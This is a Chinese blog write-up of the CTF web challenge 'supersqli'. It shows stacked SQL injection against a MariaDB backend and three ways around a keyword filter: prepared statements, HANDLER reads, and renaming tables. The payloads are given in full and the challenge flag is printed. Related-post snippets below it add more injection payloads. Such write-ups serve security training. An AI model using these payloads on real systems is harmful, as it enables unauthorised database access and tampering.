攻防世界-web supersqli

已于 2022-02-10 14:19:06 修改
阅读量468 收藏
点赞数
分类专栏: CTF 文章标签: 前端 安全 web安全
于 2022-02-10 11:26:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_48108919/article/details/122855321
版权

根据题目这是一道sql注入题

输入1'测试,成功报错

可以看到这是一个MariaDB数据库,MariaDB是MySQL的一个分支,与mysql大部分的用法都是一样的,只有一些参数,特性的不同

1.使用order by来测试字段

1' order by n #

当order by 2显示正常,当order by 3报错,可以确定有两个字段

2.使用联合查询

1' union select 1,2 #

 提示对select等操作词语进行了正则过滤,尝试使用双写、/**/绕过无效

3.使用堆叠注入

查看表';show tables#

 有两个表

依次查看两个表的数据:

';show columns from `1919810931114514`#

';show columns from words#

 方法一:绕过select的限制,采用预编译查询flag

预编译原理:https://www.cnblogs.com/gdwkong/p/7635541.html

最终payload:

';prepare pre from concat('s', 'elect * from `1919810931114514`');execute pre;#

方法二:使用handler查询

handler用法:https://blog.csdn.net/qq_43427482/article/details/109898934

最终payload: 

';handler `1919810931114514` open;handler `1919810931114514` read first;#

 方法三:修改表名法

我们输入1查询的时候,回显是有两个字段的,猜测查询的是word表(通过刚刚查询的表数据可以知道,`1919810931114514`表只有一个字段,`words`表有两个字段

 原理:将words表改名为word1或其它任意名字,修改1919810931114514表名为words,同时将flag列名改为id,通过查询words表的id,就能得到flag

注意:此方法需要对输入没有过滤alert和rename关键字:

将表名a改为b:alter table a rename to b;

将b表的列名c改为d:alter table b change c d varchar(30);

payload如下:

'; alter table words rename to words1;alter table `1919810931114514` rename to words;alter table words change flag id varchar(50);#

 再通过1' or 1=1#获取flag

flag{c168d583ed0d4d7196967b28cbd0b5e9}

码啊码
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
攻防世界web进阶区supersqli
gongjingege的博客
07-25 1839
打开链接,初步判断应该是sql注入 顺便查看一下源代码,发现sqlmap没有灵魂,估计应该不让用,得手工注入 先1’,报错 再–+,发现被正则过滤,大小写也不行 看了看大佬的wp,堆叠注入(呜,新名词。。。) inject=1’;show databases;# inject=1’;show tables;# 看一下这几个表 1’;show columns from words;# 1’;show columns from 1919810931114514;# (字符串为表名操作时要加反
攻防世界Training-Stegano-1
10-31
【标】"攻防世界Training-Stegano-1" 是一个关于信息安全领域的训练目,主要涉及的是隐写术(Steganography)技术。隐写术是一种隐藏信息的技术,通常用于在图像、音频或文本中嵌入秘密数据,使得非授权者无法...
攻防世界-Web-supersqli
uh_eng的博客
08-14 326
涉及到了堆叠注入、MySQL预编译 0x01 SQL注入目,按照流程来验证SQL注入漏洞。 首先输入1' and '1'='1发现正常输出,然后输入1' and '1'='2发现没有输出,进一步尝试联合注入,输入1' union select 1 #结果返回了 return preg_match("/select|update|delete|drop|insert|where|./i",$inject); 可见后端过滤掉了一些SQL关键字,显然不能直接通过这些关键字进行注入。 0x02 尝试使用
攻防世界web进阶区之supersqli
qq_45756971的博客
07-16 417
打开目所给链接:首先我们先探测其有无注入: 1’ 报错 1’# 正常且为True 1’ and 1=1# 正常且为True 1’ and 1=2# 正常且为False 所以它里边存在注入。 用1’ or extractvalue(rand(),concat(0x7e,database())) #爆出数据库名: 用0’; use supersqli; show tables;爆出表明:用0’; use supersqli; show columns from 1919810931114514; #
攻防世界】——WEB高手进阶--supersqli
weixin_43828818的博客
05-23 545
目进去就是一个常见的注入,提交个1正常返回数据,提交’返回错误,存在注入。 order by 2–+时候正常返回,order by 3–+报错,发现有2个字段。接着正常程序走,准备联合查询字段,果然,不可能给的那么简单,果然报错,正则过滤了一些常用的查询关键字。 尝试了多种普通绕过,大小写、重写都绕过不了,后来想到了堆叠注入;果然可以 1‘;show talbes–+ 查看两个表的字段名,在·1919810931114514·中发现我们想要的flag,查看words看一下结构。 1’;show c
攻防世界web高手进阶区supersqli——Amao~
qq_45995328的博客
09-11 155
攻防世界web高手进阶区supersqli 1.判断是否存在注入: and 1=1 、and 1=2 都可以正常显示 排除整型注入 ’ 加上报错,存在字符型注入 2. 判断字段数: 1’ order by 1、2正常显示 3 – # 报错,字段数为2 3.判断显位: 1' select 1,2 不能用联合查询,使用堆叠注入 4.查看数据库 1'; show databases -- # -- 必须加; 因为原始的sql语句格式为 select 。。。 from 。。。 where inj
攻防世界 supersqli writeup
12-14
发现有注入,注入点为injiect=2’,接下来–dbs尝试查询数据库,只爆出supersqli,但无法爆出表。 回到目 order by 判断只有两个字段(别人的writerup说–+被过滤,只能使用#,不知道为什么没有,最后发现是在查询...
攻防世界nice-bgm杂项
11-20
在网络安全领域,"攻防世界"是一个广受欢迎的在线平台,提供各种安全挑战,帮助学习者提升他们的黑客防御和攻击技能。"nice-bgm杂项"是其中的一个挑战,属于"misc"类别,这意味着它可能涉及到多种不同类型的解技巧...
攻防世界1-misc杂项
11-20
攻防世界1-misc杂项,misc。 此详细解博客:https://danbaku.blog.csdn.net/article/details/127947726
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此详细解博客:https://blog.csdn.net/m0_59188912/article/details/127836871
攻防世界Web 高手进阶区 supersqli (菜鸡蛋版本)
m0_52513952的博客
02-24 327
从进入高手进阶区开始,就越发觉得自己会的东西好少,php之前没学过,导致我压根看不懂之前那些需要读懂php源码才能拿到flag的,于是我一跳再跳,终于看到了亲切而熟悉的“sql”,一道sql注入,应该有机会能自己拿到flag了!!然而。。。
攻防世界web supersqli writeup
qq_45837896的博客
08-07 250
目主界面如上,提交1查询出一条结果 尝试单引号注入发现报错,那么判断存在注入 用order by查询有几个字段; 当order by 3的时候发现出错了 接着使用union联合查询,发现关键字被过滤了,用大写也无法绕过 于是换用堆叠注入的方法 1';show databases # 出现多个数据库,注意到有supersqli库,再次构造 1';show tables from supersqli # 发现有两个表,分别对其进行查看得 1.words 2.1919810931114514(注意查.
攻防世界SQL_LABS
yxltx_的博客
11-05 3533
攻防世界》 第一道 view-source 目 解法: 一.点击网址 二.使用 Ctrl+U查看源代码 flag:cyberpeace{0fbc7858812876713975c740d40002e3} 第二道 robots
攻防世界【NewsCenter】SQL注入方法
weixin_43923736的博客
06-20 961
攻防世界【NewsCenter】解方法
SQL注入复习 -攻防世界web【NewsCenter】
weixin_53146913的博客
04-18 179
sql注入语句复习 ' and 0 union select 1,2,3# 初步判断该sql查询返回三列数据. 1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()# 得到表名,很明显我们需要得到 secret_table 表中的内容 ' and 0 union select 1,column_name,data_type from infor
攻防世界web进阶区——NewsCenter(sql注入
一枚菜鸡
10-22 566
一、基本思路 打开网页后,出现搜索框。确认为sql注入类型。 构造 : ’ and 0 union select 1,2,3 # ’ 闭合数据库查询语句的 ’ , # 注释掉后者。 回显出,2,3字段。证明查询语句返回的数据回显字段为第二个和第三个。再次构造 ’ and 0 union select 1,table_schema,table_name from information_schema.columns # ...
XCTF-攻防世界CTF平台-Web类——7、NewsCenter(SQL注入
Onlyone_1314的博客
11-19 1715
目录标手工注入information_schema.columns 学习sqlmap工具注入: 打开目地址: 只有一个搜索框,下面是几条消息,上面输入关键词可以搜索这几条消息,可能就是存在SQL注入漏洞: 在后面加入’ or '1 = 1恒成立的判定条件: a ' or '1 = 1 搜索结果变成了所有的消息,应该就是存在SQL注入 手工注入 之后我们在后面拼接order by,来查看表中有多少列,查询结果按照前1列排序(第一个’闭合后台命令的第一个’,#注释掉后台的第二个’): ' order
攻防世界 sql注入
weixin_63231007的博客
03-20 1742
攻防世界supersql 首先添加一个单引号1' --+发现出错。 error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1 使用order by可知表由2个字段: error 1054 : Unknown column '3' i
攻防世界——web高手进阶区
热门推荐
小锤队长的博客
10-01 2万+
目录 1,cat (Django,cURL漏洞) 2,ics-05(XCTF 4th-CyberEarth)(文件包含 + preg_replace函数漏洞) 3,ics-06(爆破id) 4,lottery(.git文件泄露) 5,NewsCenter(sql注入) 6,mfv(.git文件泄露 + php审计+ 命令执行) 7,Training-WWW-Robots(robo...
攻防世界-baby_web详解
最新发布
12-21
根据提供的引用内容,攻防世界-baby_web是一个需要进行攻击和防御的网络应用。根据引用和引用[2]的描述,可以看出该应用存在注入漏洞,并且使用了一些安全措施来防止攻击者利用这些漏洞。攻击者可以通过注入恶意代码...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

码啊码

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值